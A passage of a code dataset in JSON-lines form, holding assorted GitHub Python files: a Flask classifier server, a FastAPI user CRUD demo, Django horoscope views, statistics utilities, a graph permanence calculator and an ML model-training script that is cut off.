request.get_json()\n # print(quest_json)\n data_rout = r\"./data/tax_dems_jsons\"\n with open(os.path.join(data_rout, str(quest_json['docid'])+\".json\"), 'w', encoding='utf8') as f:\n json.dump(quest_json, f)\n res = search(quest_json['docid'], quest_json['text'])\n return jsonify(res)\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\n\n\nif __name__ == '__main__':\n init()\n # global data_rout\n # data_rout = r\"./data/tax_dems_jsons\"\n\n args = argparse.ArgumentParser()\n args.add_argument('--host', dest='host', default='0.0.0.0')\n args.add_argument('--port', dest='port', default='4888')\n args = args.parse_args()\n app.run(host=args.host, port=args.port)\n","repo_name":"nichnikov/tax_tags_stend","sub_path":"server_classificator.py","file_name":"server_classificator.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42728756812","text":"import mcschematic\r\n\r\n\r\ndef single_gateway(relx, rely, relz, xout, yout, zout, schem):\r\n # set up the nbt tag\r\n nbt_tag = \"minecraft:end_gateway{Age:180,ExactTeleport:1,ExitPortal:\" \\\r\n \"{X:\" + str(xout) + \",Y:\" + str(yout) + \",Z:\" + str(zout) + \"}}\"\r\n print(nbt_tag)\r\n # place the blocks\r\n schem.setBlock((relx, rely, relz), nbt_tag)\r\n return schem\r\n","repo_name":"Patcybermind/64-bit-gateway-bus-generator-for-orenet","sub_path":"64 bit bus gen/single_gateway_function.py","file_name":"single_gateway_function.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25335485976","text":"#!/usr/bin/env python\n\nimport os\nbase_path = os.path.abspath(os.path.dirname(__file__))\n\n\ndef configuration(parent_package='', top_path=None):\n from numpy.distutils.misc_util import Configuration, get_numpy_include_dirs\n from skimage._build import cython\n\n config = Configuration('resample', 
parent_package, top_path)\n config.add_data_dir('tests')\n\n cython(['_resample.pyx'], working_path=base_path)\n\n config.add_extension(\n '_resample',\n sources=['_resample.c'],\n include_dirs=[get_numpy_include_dirs()],\n extra_compile_args=[\n \"-fopenmp\",\n \"-pthread\",\n \"-O6\",\n \"-march=native\",\n \"-mtune=native\",\n \"-funroll-all-loops\",\n \"-fomit-frame-pointer\",\n \"-march=native\",\n \"-mtune=native\",\n \"-msse4\",\n \"-ftree-vectorize\",\n \"-ftree-vectorizer-verbose=5\",\n ],\n extra_link_args=['-fopenmp'],\n )\n\n return config\n\n\nif __name__ == '__main__':\n from numpy.distutils.core import setup\n setup(configuration=configuration)\n","repo_name":"nsf-ri-ubicv/sthor","sub_path":"sthor/operation/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18519076921","text":"from math import sqrt\r\n\r\nclass Statistics:\r\n @classmethod\r\n def mean(cls, dataset):\r\n l = len(dataset)\r\n\r\n if isinstance(dataset[0], list):\r\n return [sum(dim) / l for dim in zip(*dataset)]\r\n\r\n return (sum(dataset) / l)\r\n\r\n @classmethod\r\n def variance(cls, dataset, mean_data=None):\r\n if mean_data is None:\r\n mean_data = cls.mean(dataset)\r\n\r\n l = len(dataset)\r\n if isinstance(dataset[0], list):\r\n return [sum([(i-m) ** 2 for i in xi])/l for xi, m in zip(zip(*dataset), mean_data)]\r\n\r\n return sum((xi - mean_data) ** 2 for xi in dataset) / l\r\n\r\n @classmethod\r\n def covariance(cls, dataset_u, dataset_v, mean_u=None, mean_v=None):\r\n if mean_u is None:\r\n mean_u = cls.mean(dataset_u)\r\n if mean_v is None:\r\n mean_v = cls.mean(dataset_v)\r\n\r\n return sum((xi - mean_u) * (yi - mean_v) for xi, yi in zip(dataset_u, dataset_v)) / len(dataset_v)\r\n\r\n @classmethod\r\n def std_dev(cls, dataset, mean_data=None):\r\n if isinstance(dataset[0], list):\r\n return [sqrt(var) for var in cls.variance(dataset, mean_data)]\r\n\r\n return sqrt(cls.variance(dataset, mean_data))\r\n\r\n\r\n\r\nclass Evaluation:\r\n @classmethod\r\n def _01_accuracy(cls, predictions, true_labels):\r\n return sum(1.0 if yi == ri else 0.0 for yi, ri in zip(predictions, true_labels)) / len(predictions)\r\n\r\n @classmethod\r\n def get_accuracy(cls, predictions, true_labels, scoring = \"0-1\"):\r\n if isinstance(scoring, str):\r\n if scoring == \"0-1\":\r\n scoring = cls._01_accuracy\r\n\r\n return scoring(predictions, true_labels)\r\n\r\n\r\nclass LinAlg:\r\n @classmethod\r\n def distance(cls, u, v):\r\n if isinstance(u, float):\r\n return abs(u - v)\r\n return sqrt(sum((ui - vi) ** 2 for ui, vi in zip(u, v)))\r\n\r\n","repo_name":"poooh/MLProject2018","sub_path":"ml_project/ml_project/lib/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32456219781","text":"from fastapi import FastAPI, HTTPException\nfrom typing import List, Optional \nfrom models import User, Gender, Role, UserUpdateRequest\nfrom uuid import UUID, uuid4\nfrom pydantic import BaseModel\n\n\n\napp = FastAPI()\n#Here we are adding the DB part that will be showed in localhost:8000/api/v1/users\ndb: List[User] = [\n User(\n id=UUID(\"bc9a22e2-bbc0-4203-a559-65e2579985c3\"), \n first_name=\"Juanita\", \n middle_name=\"H\",\n last_name=\"Perez\",\n gender=Gender.female,\n roles=[Role.student]\n ),\n \n User(\n id=UUID(\"539671f2-6b98-47ca-9a54-9f0e47e073f1\"), \n 
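# A short worked example of the population covariance computed above,
# cov(u, v) = sum((u_i - mean_u) * (v_i - mean_v)) / n (made-up data):
u = [1.0, 2.0, 3.0]
v = [2.0, 4.0, 6.0]
mean_u, mean_v = 2.0, 4.0
cov = sum((ui - mean_u) * (vi - mean_v) for ui, vi in zip(u, v)) / len(u)
assert abs(cov - 4.0 / 3.0) < 1e-9     # v = 2u, so cov(u, v) = 2 * var(u) = 4/3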
first_name=\"Rodolfo\", \n middle_name=\"J\",\n last_name=\"Vargas\",\n gender=Gender.male,\n roles=[Role.admin, Role.user]\n )\n]\n\n@app.get(\"/\")\nasync def root():\n return {\"Hello\": \"Mundo\"}\n\n@app.get(\"/api/v1/users\")\nasync def fetch_users():\n return db;\n\n#With this we can register new users\n@app.post(\"/api/v1/users\")\nasync def register_user(user: User):\n db.append(user)\n return {\"id\": user.id}\n\n#With this one, we can delete a user\n@app.delete(\"/api/v1/users/{user_id}\")\nasync def delete_user(user_id: UUID):\n for user in db:\n if user.id == user_id:\n db.remove(user)\n return \n raise HTTPException(\n status_code=404,\n detail=f\"user with id: {user_id} does not exists\"\n )\n\n@app.put(\"/api/v1/users/{user_id}\", response_model=User)\nasync def update_user(user_id: UUID, user_update: UserUpdateRequest):\n for user in db:\n if user.id == user_id:\n if user_update.first_name is not None:\n user.first_name = user_update.first_name\n if user_update.last_name is not None:\n user.last_name = user_update.last_name\n if user_update.middle_name is not None:\n user.middle_name = user_update.middle_name\n if user_update.roles is not None:\n user.roles = user_update.roles\n return user\n # Return a 404 response if the user with the specified ID is not found\n raise HTTPException(\n status_code=404,\n detail=f\"User with id {user_id} not found\",\n )","repo_name":"RodoVR2403/fastAPI_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6119032414","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseNotFound, HttpResponseRedirect\nfrom django.urls import reverse\n\nzodiac_dict = {\n 'aries': 'Овен - первый знак зодиака, планета Марс (с 21 марта по 20 апреля).',\n 'taurus': 'Телец - второй знак зодиака, планета Венера (с 21 апреля по 21 мая).',\n 'gemini': 'Близнецы - третий знак зодиака, планета Меркурий (с 22 мая по 21 июня).',\n 'cancer': 'Рак - четвёртый знак зодиака, Луна (с 22 июня по 22 июля).',\n 'leo': ' Лев - пятый знак зодиака, солнце (с 23 июля по 21 августа).',\n 'virgo': 'Дева - шестой знак зодиака, планета Меркурий (с 22 августа по 23 сентября).',\n 'libra': 'Весы - седьмой знак зодиака, планета Венера (с 24 сентября по 23 октября).',\n 'scorpio': 'Скорпион - восьмой знак зодиака, планета Марс (с 24 октября по 22 ноября).',\n 'sagittarius': 'Стрелец - девятый знак зодиака, планета Юпитер (с 23 ноября по 22 декабря).',\n 'capricorn': 'Козерог - десятый знак зодиака, планета Сатурн (с 23 декабря по 20 января).',\n 'aquarius': 'Водолей - одиннадцатый знак зодиака, планеты Уран и Сатурн (с 21 января по 19 февраля).',\n 'pisces': 'Рыбы - двенадцатый знак зодиака, планеты Юпитер (с 20 февраля по 20 марта).',\n}\n\ntypes = {\n 'fire': ['aries', 'leo', 'sagittarius'],\n 'earth': ['taurus', 'virgo', 'capricorn'],\n 'air': ['gemini', 'libra', 'aquarius'],\n 'water': ['cancer', 'scorpio', 'pisces']\n}\n\nduration_zodiacs = {\n (1, 19): \"capricorn\",\n (20, 49): \"aquarius\",\n (50, 79): \"pisces\",\n (80, 109): \"aries\",\n (110, 139): \"taurus\",\n (140, 169): \"gemini\",\n (170, 199): \"cancer\",\n (200, 229): \"leo\",\n (230, 259): \"virgo\",\n (260, 289): \"libra\",\n (290, 319): \"scorpio\",\n (320, 349): \"sagittarius\",\n (350, 365): \"capricorn\"\n}\n\n\ndef get_yyyy_converters(request, sign_zodiac):\n print(f'тип - {type(sign_zodiac)}')\n return HttpResponse(f'вы 
передали число из 4-х цифр - {sign_zodiac}')\n\n\ndef get_my_float_converters(request, sign_zodiac):\n print(f'тип - {type(sign_zodiac)}')\n return HttpResponse(f'вы передали вещественное число - {sign_zodiac}')\n\n\ndef get_my_date_converters(request, sign_zodiac):\n print(f'тип - {type(sign_zodiac)}')\n return HttpResponse(f'вы передали дату - {sign_zodiac}')\n\n\ndef index(request):\n zodiacs = list(zodiac_dict)\n # f\"
<li>{sign.title()}</li>\"\n    context = {\n        'zodiacs': zodiacs\n    }\n\n    return render(request, 'horoscope/index.html', context=context)\n\n\ndef choose_element(request):\n    elements = list(types)\n    li_elements = ''\n    for element in elements:\n        redirect_path = reverse(\"horoscope_group\", args=[element])\n        li_elements += f\"
<li><a href='{redirect_path}'>{element.title()}</a></li>\"\n    response = f\"\"\"\n
    <ul>\n    {li_elements}\n
    \n \"\"\"\n return HttpResponse(response)\n\n\ndef get_info_about_element(request, type_element):\n zodiacs_of_element = types[type_element]\n li_element = ''\n for sign in zodiacs_of_element:\n redirect_path = reverse(\"horoscope_name\", args=[sign])\n li_element += f\"
<li><a href='{redirect_path}'>{sign.title()}</a></li>\"\n    response = f\"\"\"\n
    <ul>\n    {li_element}\n
    \n \"\"\"\n return HttpResponse(response)\n\n\ndef get_info_about_sign_zodiac(request, sign_zodiac: str):\n description = zodiac_dict.get(sign_zodiac)\n data = {\n \"description_zodiac\": description,\n \"sign\": sign_zodiac,\n \"zodiacs\": zodiac_dict,\n\n }\n return render(request, 'horoscope/info_zodiac.html', context=data)\n\n\ndef get_info_about_sign_zodiac_by_number(request, sign_zodiac: int):\n zodiacs = list(zodiac_dict)\n if sign_zodiac > len(zodiacs):\n return HttpResponseNotFound(f\"неизвестный номер зодиака - {sign_zodiac}\")\n name = zodiacs[sign_zodiac - 1]\n redirect_url = reverse(\"horoscope_name\", args=[name])\n return HttpResponseRedirect(redirect_url)\n\n\ndef get_info_by_day(request, month, day):\n day_of_years = (month - 1) * 30 + day\n for key, value in duration_zodiacs.items():\n if day_of_years >= key[0] and day_of_years <= key[1]:\n redirect_url = reverse(\"horoscope_name\", args=[value])\n return HttpResponseRedirect(redirect_url)\n\n return HttpResponseNotFound(f\"

<h1>месяц - {month}, день - {day}</h1>
    \")\n","repo_name":"PetruninKV/horoscope_page","sub_path":"horoscope/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38543087294","text":"#!/usr/bin/env python3\n\"\"\"Check if an appropriate Python environment is activated.\"\"\"\n\n# Future imports\nfrom __future__ import (\n annotations,\n)\n\n# Standard library imports\nimport sys\nfrom typing import (\n NoReturn,\n)\n\nEXIT_BADENV = 3\n\n\ndef handle_error(error: BaseException, message: str = \"\") -> NoReturn:\n \"\"\"Handle the import error produced by a block.\"\"\"\n error_message = f\"{type(error).__name__}: {error}\"\n messages = [\n \"\",\n \"*\" * 70,\n \"ERROR: Suitible Python environment not activated\",\n message,\n \"\",\n error_message,\n \"*\" * 70,\n \"\",\n ]\n print(\"\\n\".join(messages), file=sys.stderr)\n sys.exit(EXIT_BADENV)\n\n\ndef main() -> None:\n \"\"\"Try importing key deps and fail with a friendly error message.\"\"\"\n # pylint: disable = import-outside-toplevel\n # pylint: disable = too-many-try-statements\n # pylint: disable = unused-import\n try:\n # Third party imports\n import praw # noqa: F401\n import pydantic # noqa: F401\n except ImportError as error:\n handle_error(error=error, message=\"Runtime dependencies not found\")\n\n try:\n # Third party imports\n import mypy # noqa: F401\n import pyanalyze # type: ignore[import] # noqa: F401\n import pylint # type: ignore[import] # noqa: F401\n except ImportError as error:\n handle_error(error=error, message=\"Linting dependencies not found\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"r-spacex/submanager","sub_path":"tools/check_env_activated.py","file_name":"check_env_activated.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"9466659405","text":"def sayiSeslendirme(sayi):\n sayi = int(sayi)\n birlerBasamagı = sayi % 10\n onlarBasamagı = sayi // 10\n onlar = [\"\",\"On\",\"Yirmi\",\"Otuz\",\"Kırk\",\"Elli\",\"Altmış\",\"Yetmiş\",\"Seksen\",\"Doksan\"]\n birler = [\"\", \"Bir\" ,\"İki\" ,\"Üç\" ,\"Dört\" ,\"Beş\" ,\"Altı\" ,\"Yedi\" ,\"Sekiz\" ,\"Dokuz\"]\n return onlar[onlarBasamagı] + birler[birlerBasamagı]\n\nsayi = input(\"Bir sayı giriniz : \")\nprint(\"Sayının Okunuşu : \", sayiSeslendirme(sayi))\n","repo_name":"kilicmustafa/Python","sub_path":"Python Temel/Array ve demet işlemleri/sayıOkusu.py","file_name":"sayıOkusu.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"tr","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"20814833281","text":"from typing import List\nimport networkx as nx\nimport numpy as np\n\n\nclass PermanenceCalculator:\n \"\"\"Class to compute permanence of a node in a graph with respect to a\n community and a community structure.\n \n Returns a value between -1 and 1, where -1 is the worst permanence and 1\n is the best permanence. 
But for the community deception problem, we want\n to minimize the permanence, so the best permanence is -1.\n \"\"\"\n def __init__(self, graph: nx.Graph, community_target: List[int], community_structure: List[List[int]]):\n self.graph = graph\n self.community_target = community_target\n self.community_structure = community_structure\n\n def internal_pull(self, v: int)->int:\n \"\"\"\n Compute the internal pull of a node v in a graph G with respect to a \n community C, denoted by the internal connections of a node $v$ within \n its own community;\n\n Parameters\n ----------\n v : int\n Target node\n\n Returns\n -------\n internal_edges : int\n Internal pull of node v\n \"\"\"\n internal_edges = 0\n for node in nx.neighbors(self.graph, v):\n if node in self.community_target:\n internal_edges += 1\n return internal_edges\n\n def max_external_pull(self, v: int)->int:\n \"\"\"\n Compute the maximum connections to a single external community.\n\n Parameters\n ----------\n v : int\n Target node\n\n Returns\n -------\n max_external_edges : int\n Maximum external pull of node v\n \"\"\"\n max_external_edges = 0\n for community in self.community_structure:\n if v in community:\n continue\n external_edges = 0\n for node in nx.neighbors(self.graph, v):\n if node in community:\n external_edges += 1\n max_external_edges = max(max_external_edges, external_edges)\n return max_external_edges\n\n def internal_clustering_coefficient(self, v: int)->float:\n \"\"\"\n Compute the internal clustering coefficient of a node v in a graph G\n denoted by the fraction of actual and possible number of edges among \n the internal neighbors of v.\n\n Parameters\n ----------\n v : int\n Target node\n\n Returns\n -------\n float\n Internal clustering coefficient of node v\n \"\"\"\n # Get subgraph of the community\n community_subgraph = self.graph.subgraph(self.community_target)\n \n # Delete node v from the subgraph\n subgraph_copy = community_subgraph.copy()\n subgraph_copy.remove_node(v)\n \n # Compute the number of actual edges, excluding the edges of node v\n n_actual_edges = subgraph_copy.number_of_edges()\n \n # Compute the number of possible edges, excluding the edges of node v\n n_nodes = subgraph_copy.number_of_nodes()\n num_possible_edges = (n_nodes * (n_nodes - 1)) / 2\n del subgraph_copy\n del community_subgraph\n return n_actual_edges / num_possible_edges\n\n\n def permanence(self, v: int)->float:\n \"\"\"\n Permanence of a node v in a graph G with respect to a community C and\n a community structure, denoted by the fraction of the\n internal pull of v and the maximum external pull of v, minus the\n internal clustering coefficient of v.\n\n Parameters\n ----------\n v : iny\n Node to compute permanence\n\n Returns\n -------\n permanence_v : float\n Permanence of node v\n \"\"\"\n I_v = self.internal_pull(v)\n E_max_v = self.max_external_pull(v)\n deg_v = len(list(self.graph.neighbors(v)))\n C_in_v = self.internal_clustering_coefficient(v)\n assert E_max_v > 0, \"E_max_v must be greater than 0\"\n assert deg_v > 0, \"deg_v must be greater than 0\"\n permanence_v = (I_v / E_max_v) * (1 / deg_v) - (1 - C_in_v)\n return permanence_v\n \n def normalized_permanence(self, v:int)->float:\n \"\"\"\n Normalized permanence of a node v in a graph G with respect to a \n community C and a community structure, denoted by the fraction of the\n internal pull of v and the maximum external pull of v, minus the\n internal clustering coefficient of v.\n\n Parameters\n ----------\n v : int\n Node to compute permanence\n\n 
Returns\n -------\n permanence_v : float\n Permanence of node v\n \"\"\"\n # Get permanence, return a value between -1 and 1\n permanence_v = self.permanence(v)\n # Normalized permanence between 0 and 1, it is a value\n normalized_permanence_v = (permanence_v + 1) / 2\n return normalized_permanence_v\n\n\n\nif __name__ == \"__main__\":\n graph = nx.karate_club_graph()\n # plot graph\n import matplotlib.pyplot as plt\n \n \n import sys\n sys.path.append(\"../../../\")\n from src.community_algs.detection_algs import DetectionAlgorithm\n community_structure = DetectionAlgorithm(\"walktrap\").compute_community(graph)\n community_target = community_structure[2]\n print(f\"Community target: {community_target}\")\n print(f\"Community structure: {community_structure}\")\n \n \n permanence_calculator = PermanenceCalculator(graph, community_target, community_structure)\n node_to_compute = community_target[3]\n permanence_value = permanence_calculator.permanence(node_to_compute)\n normalized_permanence_value = permanence_calculator.normalized_permanence(node_to_compute)\n \n print(f\"Permanence of node {node_to_compute}: {permanence_value}\")\n print(f\"Normalized permanence of node {node_to_compute}: {normalized_permanence_value}\")\n nx.draw(graph, with_labels=True)\n plt.show()\n","repo_name":"AndreaBe99/community-deception-thesis","sub_path":"src/community_algs/baselines/community_hiding/permanence.py","file_name":"permanence.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37728904918","text":"import pandas as pd\nfrom sklearn.linear_model import Ridge,LogisticRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier,RandomForestRegressor\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import svm\nimport os, pickle\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom random import sample\n\nos.chdir(\"/home/cemarks/Projects/cancer/sandbox\")\n\nwith open(\"/home/cemarks/Projects/cancer/sandbox/expanded_training_X.pkl\",'rb') as f:\n X = pickle.load(f)\n\n\n# print(\"\\n\".join([str(i) + \" \" + X.columns[i] for i in range(X.shape[1])]))\n# # X['log_cde'] = X.apply(lambda z: z[7]/np.log(1+z[16]),axis=1)\n\nnot_founds = [\n (6002302, \"APOLLO-2-leaderboard\", 38),\n (2608243, \"Outcome-Predictors-leaderboard\", 31)\n]\n\nINPUT_DIR = \"/home/cemarks/Projects/cancer/data/leaderboard\"\nfile_names = os.listdir(INPUT_DIR)\nfile_splits = [os.path.splitext(f) for f in file_names]\ntsvs = [i for i in file_splits if i[1] == '.tsv']\ndbs = [i[0] for i in tsvs]\nfound_inds = (X['DB'] != not_founds[0][1]) | (X['col_no'] != not_founds[0][2])\nfor j in not_founds[1:len(not_founds)]:\n found_inds = found_inds & ((X['DB'] != j[1]) | (X['col_no'] != j[2]))\n\n\nY = X.loc[found_inds]\n\n\n\nz = []\nstat_columns = [\n \"max_cde\",\n \"max_dec\",\n \"max_que\",\n \"max_syn_classsum\",\n \"max_syn_propsum\",\n \"max_syn_objsum\",\n \"max_syn_classmax\",\n \"max_syn_propmax\",\n \"max_syn_objmax\",\n \"max_enum_concept\",\n \"max_enum_ans\",\n \"max_ans_score\",\n \"max_val_score\",\n \"max_secondary_search\",\n \"pct_cde\",\n \"pct_dec\",\n \"pct_que\",\n \"pct_syn_classsum\",\n \"pct_syn_propsum\",\n \"pct_syn_objsum\",\n \"pct_syn_classmax\",\n \"pct_syn_propmax\",\n \"pct_syn_objmax\",\n \"pct_enum_concept\",\n \"pct_enum_ans\",\n \"pct_ans_score\",\n \"pct_val_score\",\n 
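# A worked numeric example of the permanence formula implemented above,
# perm(v) = (I(v) / E_max(v)) * (1 / deg(v)) - (1 - C_in(v)) (made-up numbers):
I_v = 4        # internal neighbours of v
E_max_v = 2    # strongest pull from any single external community
deg_v = 6      # total degree of v
C_in_v = 0.5   # clustering coefficient among v's internal neighbours
permanence_v = (I_v / E_max_v) * (1 / deg_v) - (1 - C_in_v)
assert abs(permanence_v - (-1.0 / 6.0)) < 1e-9
normalized = (permanence_v + 1) / 2    # maps [-1, 1] onto [0, 1]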
\"pct_secondary_search\",\n \"logn\",\n \"n\",\n \"metric2_max\"\n]\nfor i in Y['DB'].unique():\n for j in Y['col_no'].loc[Y['DB'] == i].unique():\n z.append(Y.loc[(Y['DB']==i) & (Y['col_no'] == j),stat_columns].iloc[0])\n\n\n\nD = pd.DataFrame(z)\nD['Y'] = (D['metric2_max'] == 0).astype('int') #These are nomatch rows.\n\n# D['c1'] = D['pct_secondary_search'].multiply(D['max_syn_propsum'])\n# predictor_columns.append('c1')\n# D['c2'] = D['pct_secondary_search'].multiply(D['max_syn_propsum'])\n# predictor_columns.append('c2')\n# D['c3'] = D['pct_secondary_search'].multiply(D['max_enum_ans'])\n# predictor_columns.append('c3')\n# D['c3'] = D['pct_secondary_search'].multiply(D['n'])\n# predictor_columns.append('c3')\n\ndef lr_transform(x):\n predictor_columns = [\n \"max_cde\",\n \"max_dec\",\n \"max_que\",\n # \"max_syn_classsum\",\n # \"max_syn_propsum\",\n # \"max_syn_objsum\",\n # \"max_syn_classmax\",\n \"max_syn_propmax\",\n # \"max_syn_objmax\",\n # \"max_enum_concept\",\n # \"max_enum_ans\",\n # \"max_ans_score\",\n # \"max_val_score\",\n # \"max_secondary_search\",\n # \"pct_cde\",\n # \"pct_dec\",\n # \"pct_que\",\n # \"pct_syn_classsum\",\n # \"pct_syn_propsum\",\n # \"pct_syn_objsum\",\n # \"pct_syn_classmax\",\n # \"pct_syn_propmax\",\n # \"pct_syn_objmax\",\n # \"pct_enum_concept\",\n # \"pct_enum_ans\",\n # \"pct_ans_score\",\n # \"pct_val_score\",\n # \"pct_secondary_search\",\n # \"n\",\n \"logn\"\n ]\n x_copy = x.copy()\n x_copy['c1'] = x['pct_secondary_search'].multiply(x['max_enum_ans'])\n x_copy['c2'] = x['pct_secondary_search'].multiply(x['max_val_score'])\n predictor_columns = predictor_columns + ['c1','c2']\n return(x_copy[predictor_columns].values)\n\n\n# poly = PolynomialFeatures(degree=2)\n# X_poly = poly.fit_transform(D[predictor_columns])\nkf = KFold(n_splits=10,shuffle=True)\nINDS = kf.split(D)\no = []\not = []\n\nfor train_index,test_index in INDS:\n # XX = D[predictor_columns].iloc[train_index] \n # XT = D[predictor_columns].iloc[test_index] \n XX = lr_transform(D.iloc[train_index])\n XT = lr_transform(D.iloc[test_index])\n YY = D['Y'].iloc[train_index]\n YT = D['Y'].iloc[test_index]\n s = []\n st = []\n# for c in [0.00005,0.0001,0.0002,0.0005,0.001,0.005,0.01]:\n for c in range(-8,8):\n logreg = LogisticRegression(\n C = 10**c,\n max_iter = 10000,\n tol=0.000000001,\n solver='liblinear'\n )\n logreg.fit(XX,YY)\n s.append(logreg.score(XX,YY))\n st.append(logreg.score(XT,YT))\n o.append(s)\n ot.append(st)\n\no = np.array(o)\nm = np.mean(o,axis=0)\nprint(m)\nprint()\not = np.array(ot)\nmt = np.mean(ot,axis=0)\nprint(mt)\nprint()\n\n\n\n\n\n\n\nbest_c = 10\nbest_model = LogisticRegression(\n C = best_c,\n max_iter = 10000,\n tol=0.000000001,\n solver='liblinear'\n)\ntest_inds = sample(range(D.shape[0]),10)\ntng_inds = [i for i in range(D.shape[0]) if i not in test_inds]\n\nXX = lr_transform(D.iloc[tng_inds])\nXT = lr_transform(D.iloc[test_inds])\n\nYY = D['Y'].iloc[tng_inds]\nYT = D['Y'].iloc[test_inds]\nbest_model.fit(XX,YY)\nprint(best_model.score(XX,YY))\nprint(best_model.score(XT,YT))\n\n\nprobs = best_model.predict_proba(\n XX\n)\n\ngt = [(probs[i][0],YY.iloc[i]) for i in range(len(probs))]\ngt.sort(key=lambda z: z[0])\nx = [0]\ny = [0]\n\npos_count = sum([i[1] for i in gt])\nneg_count = len(gt) - pos_count\n\nx_count = 0\ny_count = 0\nxpt = []\nypt = []\nfound = False\nfor i in gt:\n if i[1] == 0:\n x_count+=1\n else:\n y_count+=1\n if (not found) and (i[0] > 0.66):\n found = True\n xpt.append(x_count/neg_count)\n ypt.append(y_count/pos_count)\n 
x.append(x_count/neg_count)\n y.append(y_count/pos_count)\n\nx.append(1)\ny.append(1)\n\nplt.plot(x,y)\nplt.scatter(xpt,ypt,s=30,c='red')\nplt.plot([0,1],[0,1],\"--\")\nplt.show()\nplt.clf()\nplt.close()\n\n\nprobs = logreg.predict_proba(\n XT\n)\n\ngt = [(probs[i][0],YT.iloc[i]) for i in range(len(probs))]\ngt.sort(key=lambda z: z[0])\nx = [0]\ny = [0]\n\npos_count = sum([i[1] for i in gt])\nneg_count = len(gt) - pos_count\n\nx_count = 0\ny_count = 0\nfor i in gt:\n if i[1] == 0:\n x_count+=1\n else:\n y_count+=1\n x.append(x_count/neg_count)\n y.append(y_count/pos_count)\n\nx.append(1)\ny.append(1)\n\nplt.plot(x,y)\nplt.plot([0,1],[0,1],\"--\")\nplt.show()\nplt.clf()\nplt.close()\n\nmodel_dict = {\n 'model': best_model\n}\n\nwith open('nomatch_model.pkl', 'wb') as f:\n pickle.dump(model_dict,f)\n\n\n\n\n#################\n\n# Round II: get best value columns\n\nZ = Y.loc[Y['metric4']==1]\n\ndef rr_transform(x):\n predictor_columns = [\n \"secondary_search\",\n # \"ftsearch_cde\",\n \"ftsearch_dec\",\n # \"syn_classsum\",\n \"syn_propsum\",\n # \"syn_objsum\",\n # \"syn_classmax\",\n # \"syn_propmax\",\n # \"syn_objmax\",\n # \"ftsearch_question\",\n # \"enum_concept_search\",\n # \"enum_answer_search\",\n # \"answer_count_score\",\n \"value_score\",\n # \"max_cde\",\n # \"max_dec\",\n # \"max_que\",\n # \"max_syn_classsum\",\n # \"max_syn_propsum\",\n # \"max_syn_objsum\",\n # \"max_syn_classmax\",\n # \"max_syn_propmax\",\n # \"max_syn_objmax\",\n # \"max_enum_concept\",\n # \"max_enum_ans\",\n # \"max_ans_score\",\n # \"max_val_score\",\n # \"max_secondary_search\",\n # \"pct_cde\",\n # \"pct_dec\",\n # \"pct_que\",\n # \"pct_syn_classsum\",\n # \"pct_syn_propsum\",\n \"pct_syn_objsum\",\n # \"pct_syn_classmax\",\n # \"pct_syn_propmax\",\n #\"pct_syn_objmax\",\n # \"pct_enum_concept\",\n # \"pct_enum_ans\",\n # \"pct_ans_score\",\n # \"pct_val_score\",\n \"pct_secondary_search\",\n \"cde_frac\",\n # \"dec_frac\",\n \"que_frac\",\n # \"syn_classsum_frac\",\n # \"syn_propsum_frac\",\n # \"syn_objsum_frac\",\n # \"syn_classmax_frac\",\n \"syn_propmax_frac\",\n # \"syn_objmax_frac\",\n \"enum_concept_frac\",\n # \"enum_ans_frac\",\n # \"ans_score_frac\",\n # \"val_score_frac\",\n \"n\",\n \"logn\"\n ]\n poly = PolynomialFeatures(degree = 2)\n Z_poly = poly.fit_transform(x[predictor_columns])\n return Z_poly\n\n\no=[]\nfor i in range(len(tsvs)):\n tsv = tsvs[i][0]\n J = Z['col_no'].loc[Z['DB']==tsv].unique()\n for j in range(len(J)):\n o.append((tsv,J[j]))\n\nrand_ints = np.random.permutation(range(len(o)))\ntrain_test_splitpoint = int(0.85*len(rand_ints))\ntraining_inds = rand_ints[0:train_test_splitpoint]\ntest_inds = rand_ints[train_test_splitpoint:len(rand_ints)]\n\ntrain_vector = pd.Series([False]*len(Z))\ntrain_vector.index = Z.index\n\nfor t,i in enumerate(training_inds):\n train_vector = train_vector | ((Z['DB']==o[i][0]) & (Z['col_no']==o[i][1]))\n\ntest_vector = pd.Series([False]*len(Z))\ntest_vector.index = Z.index\n\nfor t,i in enumerate(test_inds):\n test_vector = test_vector | ((Z['DB']==o[i][0]) & (Z['col_no']==o[i][1]))\n\n# Z_poly= poly.fit_transform(Z[predictor_columns])\n\nZ_poly = rr_transform(Z)\nZ_train = Z_poly[train_vector]\nZ_test = Z_poly[test_vector]\n\nYY = Z['metric2_frac'].pow(2).values\n\n# for k in range(1,min(11,len(predictor_columns))):\nfor k in range(-4,4,1):\n # rfr = RandomForestRegressor(\n # n_estimators = 30,\n # max_features = k\n # )\n rfr = Ridge(\n alpha=10**k,\n fit_intercept = True,\n 